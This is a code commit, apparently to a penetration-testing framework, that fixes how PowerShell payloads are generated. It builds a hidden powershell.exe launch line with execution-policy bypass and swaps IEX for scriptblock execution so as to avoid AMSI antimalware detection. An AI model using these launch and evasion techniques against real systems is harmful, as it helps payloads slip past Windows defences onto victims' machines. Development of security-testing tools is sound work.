Address generation issues with pure PSH payloads

Powershell payloads were generating using the :generate method
mixed in from Payload::Windows::Exec which is a binary payload
mixin.

Address the breakage by implementing a generate method which simply
outputs the script code produced by the module with no additional
content prepended or appended.

While here, cleanup the commandline generation for the script being
produced by having Rex do it (this permits changes made in Rex to
benefit all consumers).

As a bonus, drop the IEX invocation since it'll trip up AMSI and
upgrade to the scripblock execution semantic.

Credit for finding this little gem goes to bperry - i dont usually
use the native powershell command shells, and managed to miss this
for a long time. Thanks boss.

Testing:
  Local in pry

@bperry: Could you test and ping me back if this is right?
bug/bundler_fix
RageLtMan 2017-10-06 12:32:52 -04:00
parent c701a53def
commit 9afdde2938
1 changed files with 12 additions and 1 deletions

View File

@ -44,7 +44,18 @@ module Payload::Windows::Powershell
script_in.gsub!('LHOST_REPLACE', lhost.to_s) script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in) script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})" command_args = {
noprofile: true,
windowstyle: 'hidden',
noninteractive: true,
executionpolicy: 'bypass'
}
cli = Rex::Powershell::Command.generate_psh_command_line(command_args)
return "#{cli} '&([scriptblock]::create(#{script})'"
end
def generate
command_string
end end
end end
end end